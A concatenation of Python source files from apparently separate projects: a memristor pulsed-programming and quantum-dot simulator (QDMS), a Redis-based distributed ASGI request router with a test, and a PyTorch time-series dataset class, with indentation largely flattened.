pulsed_programming = qdms.PulsedProgramming(circuit, 2, hrs=3000, tolerance=1, is_relative_tolerance=True,
pulse_algorithm='log')
pulsed_programming.simulate()
    assert not len(pulsed_programming.graph_resistance) - 1 == pulsed_programming.max_pulse
def test_fabien_convergence():
memristor = qdms.Data_Driven()
circuit = qdms.Circuit(memristor, 1)
pulsed_programming = qdms.PulsedProgramming(circuit, 2, hrs=3000, tolerance=1, is_relative_tolerance=True,
pulse_algorithm='fabien')
pulsed_programming.simulate()
assert not len(pulsed_programming.graph_resistance) - 1 == pulsed_programming.max_pulse
```
#### File: QDMS/qdms/Circuit.py
```python
from .Memristor import Memristor
import copy
class Circuit:
"""
This class contains all the parameters for the circuit and the voltages calculation.
Parameters
----------
number_of_memristor : int
The number of memristor that contain in the circuit.
memristor_model : MemristorModel.Memristor.Memristor
The memristor object which needs to inherit from Memristor class in MemristorModel.Memristor.
gain_resistance : float
Represents the gain of the circuit.
v_in : float
v_in is the voltage at the start of the circuit. (V)
R_L : float
Represents the resistance load (Ohm) of the wires.
is_new_architecture : bool
The simulator accept two types of architecture. If false, the old architecture is used, which is based on a
voltage divider. The new architecture moves the memristor in the feedback loop of an op-amp.
"""
def __init__(self, memristor_model, number_of_memristor, gain_resistance=0, v_in=1e-3, R_L=1,
is_new_architecture=True):
if not isinstance(memristor_model, Memristor):
            print(f'Error: memristor object <{memristor_model}> doesn\'t inherit from Memristor ABC')
exit(1)
self.memristor_model = memristor_model
self.number_of_memristor = number_of_memristor
self.gain_resistance = gain_resistance
self.v_in = v_in
self.R_L = R_L
self.is_new_architecture = is_new_architecture
self.list_memristor = []
for _ in range(number_of_memristor):
self.list_memristor.append(copy.deepcopy(memristor_model))
def print(self):
print(self.memristor_model)
print(self.number_of_memristor)
print(self.gain_resistance)
print(self.v_in)
print(self.R_L)
print(self.is_new_architecture)
print(self.list_memristor)
def calculate_voltage(self, conductance):
"""
This function calculate the voltage depending on the conductance of the memristors.
Parameters
----------
conductance : float
Conductance of the memristors (S).
Returns
----------
voltage : float
The voltage of the circuit for this conductance.
"""
if self.is_new_architecture:
voltage = (1/conductance) * (self.v_in / self.R_L)
else:
voltage = conductance * self.gain_resistance * self.v_in
return voltage
def current_conductance(self):
"""
This function return the current conductance of the circuit.
"""
g = 0
for res in self.list_memristor:
g += 1 / res.read()
return g
def current_v_out(self):
"""
This function return the current voltage output of the circuit.
"""
return self.calculate_voltage(self.current_conductance())
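# Hedged usage sketch (not part of the original class): wiring a Circuit the
# way the package's tests do, with the Data_Driven memristor model.
#
# from qdms import Data_Driven
# circuit = Circuit(memristor_model=Data_Driven(), number_of_memristor=4,
#                   is_new_architecture=True, v_in=1e-3, R_L=1)
# v_out = circuit.current_v_out()  # new architecture: v_in / (R_L * g_total)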
```
#### File: QDMS/qdms/Log.py
```python
import bz2
import pickle
import _pickle as cPickle
import os
import time
# Pickle a file and then compress it into a file with extension
def compressed_pickle(title, data):
with bz2.BZ2File(title + '.pbz2', 'w') as f:
cPickle.dump(data, f)
# Load any compressed pickle file
def decompress_pickle(file):
data = bz2.BZ2File(file, 'rb')
data = cPickle.load(data)
return data
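# Hedged round-trip sketch (not part of the original module): any picklable
# object survives the pair of helpers; the file stem is illustrative.
#
# compressed_pickle('demo', {'v_in': 1e-3})            # writes demo.pbz2
# assert decompress_pickle('demo.pbz2') == {'v_in': 1e-3}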
def save_everything_pickle(path, memristor_sim=None, qd_simulation=None, pulsed_programming=None, circuit=None, memristor=None, algorithm=None, verbose=False):
"""
This function save all the parameters in a folder name SaveData.
Parameters
----------
memristor_sim : MemristorSimulation.MemristorSimulation
The memristor simulation
qd_simulation : QDSimulation
The quantum dot simulation
pulsed_programming : PulsedProgramming.PulsedProgramming
The pulsed programming
circuit : Circuit.Circuit
Circuit
memristor : MemristorModel.Memristor.Memristor
memristor
path : string
Where the the directory_name will be.
verbose : bool
Output in console the timers..
Returns
----------
"""
if not os.path.isdir(f'{path}'):
os.mkdir(f'{path}')
if memristor is not None:
if verbose:
print('\n##########################\n'
'Start saving')
start = time.time()
compressed_pickle(f'{path}\\memristor', memristor)
if verbose:
print(f'Memristor: {time.time()-start}')
start = time.time()
if circuit is not None:
compressed_pickle(f'{path}\\circuit', circuit)
if verbose:
print(f'Circuit: {time.time()-start}')
start = time.time()
if pulsed_programming is not None:
compressed_pickle(f'{path}\\pulsed_programming', pulsed_programming)
if verbose:
print(f'Pulsed programming: {time.time()-start}')
start = time.time()
if memristor_sim is not None:
compressed_pickle(f'{path}\\memristor_sim', memristor_sim)
if verbose:
print(f'Memristor simulation: {time.time()-start}')
start = time.time()
if qd_simulation is not None:
compressed_pickle(f'{path}\\qd_simulation', qd_simulation)
if verbose:
print(f'QD simulation: {time.time()-start}')
start = time.time()
    if algorithm is not None:
        compressed_pickle(f'{path}\\algorithm', algorithm)
        if verbose:
            print(f'Algorithm: {time.time()-start}')
def load_everything_pickle(path, verbose=False):
"""
    This function loads a full simulation from a directory path, using the original names created by save_everything_pickle().
Parameters
----------
path : string
The directory path from where the data is.
verbose : bool
Output in console the timers.
Returns
----------
memristor : MemristorModel.Memristor.Memristor
memristor.
circuit : Circuit.Circuit
Circuit.
memristor_sim : MemristorSimulation.MemristorSimulation
The memristor simulation.
pulsed_programming : PulsedProgramming.PulsedProgramming
The pulsed programming.
qd_simulation : QDSimulation
The quantum dot simulation.
"""
if verbose:
print('\n##########################\n'
'Start loading')
start = time.time()
memristor = decompress_pickle(f"{path}\\memristor.pbz2") if os.path.exists(f"{path}\\memristor.pbz2") else None
if verbose:
print(f'Memristor loaded: {time.time()-start}')
start = time.time()
circuit = decompress_pickle(f"{path}\\circuit.pbz2") if os.path.exists(f"{path}\\circuit.pbz2") else None
if verbose:
print(f'Circuit loaded: {time.time()-start}')
start = time.time()
memristor_sim = decompress_pickle(f"{path}\\memristor_sim.pbz2") if os.path.exists(f"{path}\\memristor_sim.pbz2") else None
if verbose:
print(f'Memristor simulation loaded: {time.time()-start}')
start = time.time()
pulsed_programming = decompress_pickle(f"{path}\\pulsed_programming.pbz2") if os.path.exists(f"{path}\\pulsed_programming.pbz2") else None
if verbose:
print(f'Pulsed programming loaded: {time.time()-start}')
start = time.time()
qd_simulation = decompress_pickle(f"{path}\\qd_simulation.pbz2") if os.path.exists(f"{path}\\qd_simulation.pbz2") else None
if verbose:
        print(f'Quantum dot simulation loaded: {time.time()-start}')
        start = time.time()
    algorithm = decompress_pickle(f"{path}\\algorithm.pbz2") if os.path.exists(f"{path}\\algorithm.pbz2") else None
    if verbose:
        print(f'Algorithm loaded: {time.time()-start}')
return memristor, circuit, memristor_sim, pulsed_programming, qd_simulation, algorithm
```
#### File: QDMS/qdms/PulsedProgramming.py
```python
import numpy as np
import math
import time
class PulsedProgramming:
"""
This class contains all the parameters for the Pulsed programming on a memristor model.
After initializing the parameters values, start the simulation with self.simulate()
Parameters
----------
max_voltage : float
The max voltage (V) of a pulse. If 0, no limit is apply.
pulse_algorithm : string
The pulse algorithm use. Those are the available choices (Sources in the methods). Default is 'fabien'.
'fabien' : Use fabien_convergence()
'log' : Use a log_convergence()
    tolerance : float
        The tolerance_value input is an int that represents the absolute tolerance (Ohm) from the res_states the
        pulsed programming will find. Smaller is more precise, but too small may never converge.
    is_relative_tolerance : bool
        If true, the tolerance_value is a percentage instead of (Ohm). ex: 10 : if true, 10% ; if false, 10 Ohm
variability_write : iterable[float]
A gaussian distribution with (mu=0, sigma=variance_write)
index_variability : int
Index of the current variability. If over 1000, reset to 0.
variance_write : float
Variance of the gaussian distribution on the memristor write. See variability.
graph_resistance : List[Union[float, int]]
Contains all resistance of the simulation. It's used in the creation of plots.
graph_voltages : List[Union[float, int]]
Contains all voltages of the simulation. It's used in the creation of plots.
number_of_reading : int
The number of correct value read before passing to the next state.
max_pulse : int
The max number of pulses.
"""
def __init__(self, memristor_simulation, pulse_algorithm='fabien', max_voltage=0, tolerance=0, is_relative_tolerance=False,
variance_write=0, number_of_reading=1, max_pulse=20000, verbose=False, plot_memristor=0):
self.memristor_simulation = memristor_simulation
self.pulse_algorithm = pulse_algorithm
self.tolerance = tolerance
self.max_voltage = max_voltage
self.is_relative_tolerance = is_relative_tolerance
self.variance_write = variance_write
self.number_of_reading = number_of_reading
self.max_pulse = max_pulse
self.verbose = verbose
self.voltage_output = {}
self.plot_memristor = plot_memristor
self.index_variability = 0
self.variability_write = np.random.normal(0, variance_write, 1000)
self.graph_resistance = []
self.graph_voltages = []
def print(self):
print(self.pulse_algorithm)
print(self.tolerance)
print(self.max_voltage)
print(self.voltage_output)
print(self.is_relative_tolerance)
print(self.variance_write)
print(self.number_of_reading)
print(self.max_pulse)
print(self.verbose)
print(np.array(self.graph_resistance))
print(np.array(self.graph_voltages))
def write_resistance(self, memristor, voltage, t_pulse):
"""
This function change the resistance of the memristor by applying a voltage fo t_pulse.
Parameters
----------
memristor : Memristor
The memristor wrote.
voltage : float
The voltage (V) applied.
t_pulse : float
The time of the writing pulse. (s)
Returns
----------
"""
t = int(t_pulse / memristor.time_series_resolution)
signal = [voltage] * t
memristor.simulate(signal)
self.index_variability = self.index_variability + 1 if self.index_variability < len(self.variability_write) - 1 else 0
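        # Apply the write variability as a relative perturbation of the
        # resistance, R' = R * (1 + eps) with eps ~ N(0, variance_write),
        # expressed here on the conductance g = 1 / R.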
memristor.g = 1 / (1 / memristor.g + (1 / memristor.g) * self.variability_write[self.index_variability])
def find_number_iteration(self):
"""
        This function finds the number of iterations needed to create the resistance list depending on the distribution type
        Returns
        ----------
        number_iteration : int
            number of iteration
        """
        number_iteration = 1
        # Note: distribution_type and circuit are attributes of the deprecated
        # PulsedProgramming and are not set by this class's __init__.
        if self.distribution_type == 'full_spread':
            number_iteration = self.circuit.number_of_memristor
return number_iteration
def simulate(self, voltages_target, precision=None):
"""
This function will set the memristors to the resistance wanted in each voltages_target package.
Parameters
----------
voltages_target : dict
dict with keys as voltage and package as list of resistance
precision : list
[[macro_tune, is_relative_variability], [fine_tune, is_relative_variability]] for the balance() method.
"""
if self.pulse_algorithm != 'fabien' and self.pulse_algorithm != 'log':
raise(Exception(f'Pulse algorithm not supported: {self.pulse_algorithm}'))
# voltages_target_list = list(voltages_target.keys())
# resolution = voltages_target_list[1] - voltages_target_list[0]
index = 1
conf_done = 0
start_time = time.time()
diff_voltage = {}
for v in list(voltages_target.keys()):
if index == 1:
start_time_ = time.time()
self.simulate_list_memristor(voltages_target[v], precision)
self.voltage_output[self.memristor_simulation.circuit.current_v_out()] = [i.read() for i in self.memristor_simulation.circuit.list_memristor]
diff_voltage[abs(v - self.memristor_simulation.circuit.current_v_out())] = [round(1 / np.sum([1/res for res in voltages_target[v]]), 4), round(1 / self.memristor_simulation.circuit.current_conductance(), 4)]
if index == 50 and self.verbose:
conf_done += index
print(f'Conf done: {conf_done}\tTook: {round(time.time() - start_time_, 2)} s\tTime left: {round((time.time() - start_time_) * (len(voltages_target.keys()) - conf_done) / 50, 2)} s')
index = 0
index += 1
if self.verbose:
print(f'Total time: {time.time() - start_time}')
print()
for key in diff_voltage.keys():
print(f'{round(key*1000, 4)} mV\t{diff_voltage.get(key)[0]}\t{diff_voltage.get(key)[1]} (Ohm)')
print(f'Mean diff: {np.mean(list(diff_voltage.keys()))}')
print(f'Min diff: {np.min(list(diff_voltage.keys()))}\tMax diff: {np.max(list(diff_voltage.keys()))}')
return self.voltage_output
def simulate_list_memristor(self, list_resistance, precision):
"""
This function will set the memristors to the resistance wanted list_resistance.
Parameters
----------
list_resistance : list
list of the wanted resistance for the memristor.
precision : list
[[macro_tune, is_relative_variability], [fine_tune, is_relative_variability]] for the balance() method.
"""
for i in range(self.memristor_simulation.circuit.number_of_memristor):
plot = True if i == self.plot_memristor else False
if self.pulse_algorithm == 'fabien':
self.fabien_convergence(self.memristor_simulation.circuit.list_memristor[i], list_resistance[i], plot=plot)
elif self.pulse_algorithm == 'log':
self.log_convergence(self.memristor_simulation.circuit.list_memristor[i], list_resistance[i], plot=plot)
self.balance(list_resistance, precision)
def balance(self, list_resistance, precision):
"""
This function will set the memristors to the resistance wanted list_resistance.
Parameters
----------
list_resistance : list
list of the wanted resistance for the memristor.
precision : list
[[macro_tune, is_relative_variability], [fine_tune, is_relative_variability]] for the balance() method. If 0,
won't do it.
"""
final_g = np.sum([1 / i for i in list_resistance])
delta_g = final_g - self.memristor_simulation.circuit.current_conductance()
for i in range(self.memristor_simulation.circuit.number_of_memristor):
plot = True if -(i+1) == self.plot_memristor else False
final_res = 1 / (self.memristor_simulation.circuit.list_memristor[-(i+1)].g + delta_g)
if self.memristor_simulation.circuit.memristor_model.r_on <= final_res <= self.memristor_simulation.circuit.memristor_model.r_off:
p_tolerance, p_relative = self.tolerance, self.is_relative_tolerance
# print(f'{final_res}\t{1 / self.memristor_simulation.circuit.list_memristor[-(i+1)].g}\t{final_g - self.memristor_simulation.circuit.current_conductance()}')
                if precision is not None and precision[0][0] != 0:
self.tolerance, self.is_relative_tolerance = precision[0][0], precision[0][1]
self.fabien_convergence(self.memristor_simulation.circuit.list_memristor[-(i+1)], final_res, plot)
# print(f'{final_res}\t{1 / self.memristor_simulation.circuit.list_memristor[-(i+1)].g}\t{final_g - self.memristor_simulation.circuit.current_conductance()}')
                if precision is not None and precision[1][0] != 0:
self.tolerance, self.is_relative_tolerance = precision[1][0], precision[1][1]
self.small_convergence(self.memristor_simulation.circuit.list_memristor[-(i+1)], final_res, plot)
# print(f'{final_res}\t{1 / self.memristor_simulation.circuit.list_memristor[-(i+1)].g}\t{final_g - self.memristor_simulation.circuit.current_conductance()}')
self.tolerance, self.is_relative_tolerance = p_tolerance, p_relative
break
def small_convergence(self, memristor, target_res, plot=False):
"""
This function run the pulsed programming with a variable voltage to set the target_res for the memristor with a
really small increment.
Parameters
----------
memristor : Memristor
The memristor object
target_res : float
The target resistance
"""
step = 0.001
positive_voltage = voltage_set = 0.1
negative_voltage = voltage_reset = -0.1
if self.is_relative_tolerance:
res_max = target_res + self.tolerance * target_res / 100
res_min = target_res - self.tolerance * target_res / 100
else:
res_max = target_res + self.tolerance
res_min = target_res - self.tolerance
start_len_res = len(self.graph_resistance)
start_len_v = len(self.graph_voltages)
counter = 0
action = 'read'
flag_finish = False
counter_read = 0
while not flag_finish:
current_res = memristor.read()
if res_min <= current_res <= res_max:
counter_read += 1
if plot:
action = 'read'
self.graph_voltages.append([0.2, counter + start_len_v, action])
elif current_res < res_min:
if self.max_voltage != 0:
negative_voltage = -self.max_voltage if negative_voltage <= -self.max_voltage else negative_voltage
self.write_resistance(memristor, negative_voltage, 200e-9)
if plot:
action = 'reset'
self.graph_voltages.append([negative_voltage, counter + start_len_v, action])
negative_voltage -= step
positive_voltage = voltage_set
elif current_res > res_max:
if self.max_voltage != 0:
positive_voltage = self.max_voltage if positive_voltage >= self.max_voltage else positive_voltage
self.write_resistance(memristor, positive_voltage, 200e-9)
if plot:
action = 'set'
self.graph_voltages.append([positive_voltage, counter + start_len_v, action])
positive_voltage += step
negative_voltage = voltage_reset
if counter_read == self.number_of_reading:
flag_finish = not flag_finish
if counter >= self.max_pulse:
flag_finish = not flag_finish
print(f'Got max pulse {self.max_pulse}')
if plot:
self.graph_resistance.append([current_res, counter + start_len_res, action, flag_finish])
counter += 1
def log_convergence(self, memristor, target_res, plot=False):
"""
This function run the pulsed programming with a variable voltage to set the target_res for the memristor.
From : https://arxiv.org/abs/2103.09931
Parameters
----------
memristor : Memristor
The memristor object
target_res : float
The target resistance
"""
positive_voltage = voltage_set = 0.5
negative_voltage = voltage_reset = -0.5
# additional parameters
min_shift = 0.005
max_shift = 0.2
a = 0.1
if self.is_relative_tolerance:
res_max = target_res + self.tolerance * target_res / 100
res_min = target_res - self.tolerance * target_res / 100
else:
res_max = target_res + self.tolerance
res_min = target_res - self.tolerance
start_len_res = len(self.graph_resistance)
start_len_v = len(self.graph_voltages)
counter = 0
action = 'read'
flag_finish = False
counter_read = 0
r_shift = 1
current_res = memristor.read()
while not flag_finish:
if res_min < current_res < res_max:
counter_read += 1
if plot:
action = 'read'
self.graph_voltages.append([0.2, counter + start_len_v, action])
elif current_res > res_max:
if r_shift < min_shift * (memristor.r_off - memristor.r_on):
positive_voltage += a * np.log10(abs(target_res - current_res) / r_shift)
elif r_shift > max_shift * (memristor.r_off - memristor.r_on):
positive_voltage = voltage_set
if self.max_voltage != 0:
positive_voltage = self.max_voltage if positive_voltage >= self.max_voltage else positive_voltage
self.write_resistance(memristor, positive_voltage, 200e-9)
if plot:
action = 'set'
self.graph_voltages.append([positive_voltage, counter + start_len_v, action])
elif current_res < res_min:
if r_shift < min_shift * (memristor.r_off - memristor.r_on):
negative_voltage -= a * np.log10(abs((target_res - current_res) / r_shift))
elif r_shift > max_shift * (memristor.r_off - memristor.r_on):
negative_voltage = voltage_reset
if self.max_voltage != 0:
negative_voltage = -self.max_voltage if negative_voltage <= -self.max_voltage else negative_voltage
self.write_resistance(memristor, negative_voltage, 200e-9)
if plot:
action = 'reset'
self.graph_voltages.append([negative_voltage, counter + start_len_v, action])
if counter_read == self.number_of_reading:
flag_finish = not flag_finish
if counter >= self.max_pulse:
flag_finish = not flag_finish
print('Got max pulse')
if plot:
self.graph_resistance.append([current_res, counter + start_len_res, action, flag_finish])
counter += 1
previous_res = current_res
current_res = memristor.read()
r_shift = abs(current_res - previous_res) if abs(current_res - previous_res) != 0 else 1
def fabien_convergence(self, memristor, target_res, plot=False):
"""
        This function runs the pulsed programming with a variable voltage to set target_res on the memristor.
        From : https://iopscience.iop.org/article/10.1088/0957-4484/23/7/075201
        Parameters
        ----------
        memristor : Memristor
            The memristor object
        target_res : float
            The target resistance
        plot : bool
            If True, record the pulses in graph_voltages and graph_resistance
"""
step = 0.005
positive_voltage = voltage_set = 0.5
negative_voltage = voltage_reset = -0.5
if self.is_relative_tolerance:
res_max = target_res + self.tolerance * target_res / 100
res_min = target_res - self.tolerance * target_res / 100
else:
res_max = target_res + self.tolerance
res_min = target_res - self.tolerance
start_len_res = len(self.graph_resistance)
start_len_v = len(self.graph_voltages)
counter = 0
action = 'read'
flag_finish = False
counter_read = 0
while not flag_finish:
current_res = memristor.read()
if res_min <= current_res <= res_max:
counter_read += 1
if plot:
action = 'read'
self.graph_voltages.append([0.2, counter + start_len_v, action])
elif current_res < res_min:
if self.max_voltage != 0:
negative_voltage = -self.max_voltage if negative_voltage <= -self.max_voltage else negative_voltage
self.write_resistance(memristor, negative_voltage, 200e-9)
if plot:
action = 'reset'
self.graph_voltages.append([negative_voltage, counter + start_len_v, action])
negative_voltage -= step
positive_voltage = voltage_set
elif current_res > res_max:
if self.max_voltage != 0:
positive_voltage = self.max_voltage if positive_voltage >= self.max_voltage else positive_voltage
self.write_resistance(memristor, positive_voltage, 200e-9)
if plot:
action = 'set'
self.graph_voltages.append([positive_voltage, counter + start_len_v, action])
positive_voltage += step
negative_voltage = voltage_reset
if counter_read == self.number_of_reading:
flag_finish = not flag_finish
if counter >= self.max_pulse:
flag_finish = not flag_finish
print('Got max pulse')
if plot:
self.graph_resistance.append([current_res, counter + start_len_res, action, flag_finish])
# print(f'{self.graph_resistance[-1]}\t{self.graph_voltages[-1]}')
counter += 1
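    # Hedged usage sketch (assumptions: `pp` is an instance of the enclosing
    # pulsed-programming class with tolerance, max_voltage, max_pulse and
    # number_of_reading already configured, and `mem` is a Memristor object):
    #
    #   pp.tolerance, pp.is_relative_tolerance = 1.0, True   # +/- 1 % band
    #   pp.fabien_convergence(mem, target_res=5e3, plot=True)
    #   pp.log_convergence(mem, target_res=5e3)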
```
#### File: QDMS/qdms/QDSimulation.py
```python
import time
from .coulomb_blockade import *
class QDSimulation:
"""
This class contains all the parameters for the quantum dot simulation using coulomb_blockade.py.
After initializing the parameters values, start the simulation with self.simulate()
Parameters
----------
    stability_diagram : list of list of float
        Contains the number of electrons as a function of the voltages in x and y.
parameter_model : string
        Parameter model that sets Cg1, Cg2, CL and CR according to existing quantum dots. UNSW is the default.
        Here are the implemented models:
'UNSW' : http://unsworks.unsw.edu.au/fapi/datastream/unsworks:42863/SOURCE02?view=true#page=172&zoom=100,160,768
Range: x = y = (0, 0.05)
'QuTech' : https://www.nature.com/articles/s41586-021-03469-4
Range: x = y = (0, 0.15)
'Princeton' : https://dataspace.princeton.edu/bitstream/88435/dsp01f4752k519/1/Zajac_princeton_0181D_12764.pdf
Range: x = y = (0, 0.035)
'Sandia_national_lab' : https://ieeexplore.ieee.org/stamp/stamp.jsp?arnumber=7838537
Range: x = y = (0, 0.4)
'CEA_LETI' : https://journals.aps.org/prapplied/abstract/10.1103/PhysRevApplied.14.024066
Range: x = (0, 0.09) ; y = (0, 0.045)
'UCL' : https://journals.aps.org/prxquantum/abstract/10.1103/PRXQuantum.2.010353
Range: x = y = (0, 0.95)
    voltages_x, voltages_y : Iterable[float]
        Gate voltages (V) from the memristor simulation, along the x and y axes.
Cg1 : float
Gate 1 capacitance (F).
Cg2 : float
Gate 2 capacitance (F).
CL : float
Ratio of the left capacitance (F).
CR : float
Ratio of the right capacitance (F).
T : float
Temperature (K)
    N_max : int
        Maximum number of electrons
Cm : float
Ratio of the cross capacitance.
    verbose : bool
        If True, print timing information to the console.
"""
def __init__(self, voltages_x, voltages_y, T=0.1, Cm=0.4, parameter_model='UNSW', verbose=True):
self.stability_diagram = [[None for _ in range(len(voltages_x))] for _ in range(len(voltages_y))]
self.voltages_x = voltages_x
self.voltages_y = voltages_y
self.Cg1 = 0
self.Cg2 = 0
self.CL = 0
self.CR = 0
self.parameter_model = parameter_model.lower()
self.set_parameter_model()
self.T = T
self.Cm = Cm
self.kB = 1.381e-23
self.N_min, self.N_max = self.find_number_electron()
self.verbose = verbose
def print(self):
print(np.array(self.stability_diagram))
print(np.array(self.voltages_x))
print(np.array(self.voltages_y))
print(self.Cg1)
print(self.Cg2)
print(self.CL)
print(self.CR)
print(self.T)
print(self.Cm)
print(self.kB)
print(self.N_min)
print(self.N_max)
print(self.verbose)
def set_parameter_model(self):
if self.parameter_model == 'UNSW'.lower():
self.Cg1 = 10.3e-18
self.Cg2 = self.Cg1
self.CL = 5 * self.Cg1
self.CR = self.CL
elif self.parameter_model == 'QuTech'.lower():
self.Cg1 = 5.80e-18
self.Cg2 = 4.56e-18
self.CL = 2.5 * self.Cg1
self.CR = 2.7 * self.Cg2
elif self.parameter_model == 'Princeton'.lower():
self.Cg1 = 24.3e-18
self.Cg2 = self.Cg1
self.CL = 0.08 * self.Cg1
self.CR = self.CL
elif self.parameter_model == 'Sandia_national_lab'.lower():
self.Cg1 = 1.87e-18
self.Cg2 = self.Cg1
self.CL = 1.7*self.Cg1
self.CR = self.CL
elif self.parameter_model == 'CEA_LETI'.lower():
self.Cg1 = 10.3e-18
self.Cg2 = 19.7e-18
self.CL = 0.1 * self.Cg1
self.CR = 0.2 * self.Cg2
elif self.parameter_model == 'UCL'.lower():
self.Cg1 = 9.1e-19
self.Cg2 = self.Cg1
self.CL = 2.2 * self.Cg1
self.CR = self.CL
else:
raise Exception(f'Parameter model {self.parameter_model} not supported.')
def simulate(self):
"""
        Simulate the number of electrons as a function of the gate voltages.
        The output is stored in self.stability_diagram.
"""
if self.verbose:
print()
print("##########################")
print(f"Start QD simulation with {len(self.voltages_x)} voltages and {self.N_max} electrons")
x, y = np.meshgrid(self.voltages_x, self.voltages_y)
self.stability_diagram = N_moy_DQD(x, y, Cg1=self.Cg1, Cg2=self.Cg2, Cm=self.Cm * (self.Cg1+self.Cg2)/2,
CL=self.CL, CR=self.CR, N_min=self.N_min, N_max=self.N_max,
kBT=2 * self.kB * self.T, e=1.602e-19, verbose=self.verbose)
def find_number_electron(self):
if self.parameter_model == 'UNSW'.lower():
return int(min(self.voltages_x) * 65), int(max(self.voltages_x) * 65)
elif self.parameter_model == 'QuTech'.lower():
return int(min(self.voltages_x) * 30), int(max(self.voltages_x) * 35)
elif self.parameter_model == 'Princeton'.lower():
return int(min(self.voltages_x) * 155), int(max(self.voltages_x) * 155)
elif self.parameter_model == 'Sandia_national_lab'.lower():
return int(min(self.voltages_x) * 10), int(max(self.voltages_x) * 15)
elif self.parameter_model == 'CEA_LETI'.lower():
return int(min(self.voltages_x) * 60), int(max(self.voltages_x) * 125)
elif self.parameter_model == 'UCL'.lower():
return int(min(self.voltages_x) * 1), int(max(self.voltages_x) * 10)
else:
raise Exception(f'Parameter model {self.parameter_model} not supported.')
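    # Hedged usage sketch (assumptions: numpy is provided by the wildcard
    # import above, and the voltage span follows the 'UNSW' range from the
    # class docstring):
    #
    #   volts = np.linspace(0, 0.05, 100)
    #   sim = QDSimulation(volts, volts, T=0.1, parameter_model='UNSW')
    #   sim.simulate()                      # fills sim.stability_diagram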
``` |
{
"source": "3jackdaws/distributed-asgi",
"score": 2
} |
#### File: distributed-asgi/distributed_asgi/producer.py
```python
import logging
import aioredis
import uuid
import asyncio
import marshal
import re
from .common import ASGI_EVENTS_KEY_PREFIX, send_error
from concurrent.futures import CancelledError
logger = logging.getLogger()
def print(*args):
logging.getLogger().info(*args)
class Distributor:
key = ASGI_EVENTS_KEY_PREFIX
worker_timeout = 5
redis_options = {
"address": "redis://localhost:6379",
"password": <PASSWORD>
}
def __init__(self, scope):
self.scope = scope
channel_base = str(uuid.uuid4()).replace("-", "")
self.recv_channel = f"{channel_base}-recv"
self.send_channel = f"{channel_base}-send"
self.recv_future = None # type: asyncio.Future
self.worker_info = None
async def __call__(self, receive, send):
consumer_channel = str(self.key)
message = {
"channels": [self.recv_channel, self.send_channel],
"scope": self.scope
}
data = marshal.dumps(message)
self.redis = await aioredis.create_redis(**self.redis_options)
# Push ASGI Event onto Redis queue
await self.redis.rpush(consumer_channel, data)
# Start forwarding events
self.recv_future = asyncio.ensure_future(self.handle_recv(receive))
# Wait for reply that worker has received event
response = await self.redis.blpop(self.send_channel, timeout=self.worker_timeout)
if response is None:
await send_error(send, 504, b"Worker Timeout")
logger.warning(f"No workers responded to [{self.key}] event")
self.stop()
else:
self.worker_info = marshal.loads(response[1])
await self.handle_send(send)
async def handle_recv(self, receive):
while True:
try:
message = await receive()
await self.redis.rpush(self.recv_channel, marshal.dumps(message))
except Exception as e:
if type(e) is not CancelledError:
logger.error(f"[RECV] {str(e)}")
async def handle_send(self, send):
while True:
try:
key, raw_message = await self.redis.blpop(self.send_channel)
message = marshal.loads(raw_message)
if message['type'] == "app.terminate":
self.stop()
break
await send(message)
except Exception as e:
if type(e) is not CancelledError:
logger.error(f"[SEND] {str(e)}")
def stop(self):
self.recv_future.cancel() if self.recv_future else None
def create_distributor(host='localhost', port='6379', db=None, password=<PASSWORD>, key=ASGI_EVENTS_KEY_PREFIX):
x = key
class ASGIDistributor(Distributor):
key = x
redis_options = {
"address": f"redis://{host}:{port}",
"password": password,
"db": db
}
return ASGIDistributor
def _get_key(path, routes: dict):
for pattern, key_template in routes.items():
match = pattern.match(path)
if match:
return match.expand(key_template)
return None
def create_path_distributor(
host='localhost',
port='6379',
db=None,
password=<PASSWORD>,
routes={".*": "ALL"}
):
routes = {re.compile(pattern):template for pattern, template in routes.items()}
def return_distributor(scope):
queue_key = _get_key(scope['path'], routes)
return create_distributor(
host,
port,
db,
password,
key=queue_key
)(scope)
return return_distributor
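# Hedged usage sketch (assumption: the returned callable is mounted as an
# ASGI application and served by any ASGI server, e.g. uvicorn):
#
#   app = create_path_distributor(
#       host='localhost', port='6379',
#       routes={r"/api/([a-z-]+)": r"\1"},   # queue key expanded from path
#   )
#   # uvicorn mymodule:app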
```
#### File: distributed-asgi/tests/test_things.py
```python
import pytest
from distributed_asgi import create_path_distributor
def test_path_distributor():
dist = create_path_distributor(routes={
"/api/([a-z-]+)": r"\1"
})
for path, expected_key in [
("/api/banana", "banana"),
("/banana", None),
]:
instance = dist({"path":path})
assert instance.key == expected_key
``` |
{
"source": "3jackdaws/esms",
"score": 2
} |
#### File: esms/esms/endpoints.py
```python
from .exceptions import UnsupportedCarrier
CARRIERS = {
"alltel": {
"sms": "message.alltel.com",
"mms": "mms.alltelwireless.com"
},
"att": {
"sms": "txt.att.net",
"mms": "mms.att.net"
},
"boost": {
"sms": "myboostmobile.com",
"mms": "myboostmobile.com"
},
"cricket": {
"sms": "sms.cricketwireless.net",
"mms": "mms.cricketwireless.net"
},
"fi": {
"sms": "msg.fi.google.com",
"mms": "msg.fi.google.com"
},
"sprint": {
"sms": "messaging.sprintpcs.com",
"mms": "pm.sprint.com"
},
"tmobile": {
"sms": "tmomail.net",
"mms": "tmomail.net"
},
"us-cellular": {
"sms": "email.uscc.net",
"mms": "mms.uscc.net"
},
"verizon": {
"sms": "vtext.com",
"mms": "vzwpix.com"
},
"virgin": {
"sms": "vmobl.com",
"mms": "vmpix.com"
}
}
def get_carrier(carrier):
    endpoints = CARRIERS.get(carrier)
    if endpoints is None:
        raise UnsupportedCarrier("{} does not map to a supported carrier".format(carrier))
    return endpoints
def get_sms_address(carrier:str, number:str):
carrier = get_carrier(carrier)
return "{}@{}".format(
number,
carrier.get("sms")
)
def get_mms_address(carrier, number):
carrier = get_carrier(carrier)
return "{}@{}".format(
number,
carrier.get("mms")
)
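# Hedged usage sketch: the helpers build email-to-SMS/MMS gateway addresses.
#
#   get_sms_address("verizon", "5551234567")  # -> "[email protected]"
#   get_mms_address("att", "5551234567")      # -> "[email protected]"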
``` |
{
"source": "3jane/pytorch_ext",
"score": 3
} |
#### File: data/datasets/TimeseriesDataset.py
```python
from torch.utils.data import Dataset
class TimeseriesDataset(Dataset):
def __init__(self, X, y, seq_len=1):
self.X = X
self.y = y
self.seq_len = seq_len
def __len__(self):
        return len(self.X) - (self.seq_len - 1)
def __getitem__(self, index):
return self.X[index:index + self.seq_len], self.y[index + self.seq_len - 1]
